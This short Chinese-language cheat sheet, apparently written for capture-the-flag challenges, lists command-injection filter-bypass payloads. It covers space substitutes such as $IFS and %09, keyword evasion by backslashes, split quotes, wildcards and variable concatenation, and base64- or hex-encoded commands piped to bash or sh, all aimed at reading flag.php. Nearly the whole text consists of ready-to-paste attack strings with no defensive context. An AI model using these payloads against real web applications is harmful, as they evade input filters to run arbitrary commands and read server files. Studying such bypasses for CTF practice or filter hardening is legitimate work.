过滤空格
1
2
3
4
5
6
7
8
| $IFS
${IFS}//IFS首选
$IFS$9
<
<>
{cat,flag.php}//用逗号实现了空格功能,需要用{}括起来
%20
%09 (tab功能)
|
过滤关键字
1
2
3
4
5
6
7
8
9
10
11
| ca\t fla\g.php 反斜杠绕过
cat fl''ag.php 两个单引号绕过
echo "c3lzdGVtKCJjYXQgZmxhZy5waHAiKQ==" | base64 -d | bash base64编码绕过
echo "c3lzdGVtKCJjYXQgZmxhZy5waHAiKQ==" | base64 -d | sh (如果过滤了bash,可以用sh)
echo "73797374656d282263617420666c61672e7068702229" | xxd -r -p | bash hex编码绕过
cat fl[a]g.php 用[]匹配
cat fla* 用[]匹配任意
cat fla?
cat fl{a..z}g
内联执行 cat `ls`(将反应内的输出作为输入命令来执行)
变量 a=fl;b=ag;cat $a$b.php
|
https://developer.aliyun.com/article/1224913
https://www.cnblogs.com/echoDetected/p/13909531.html
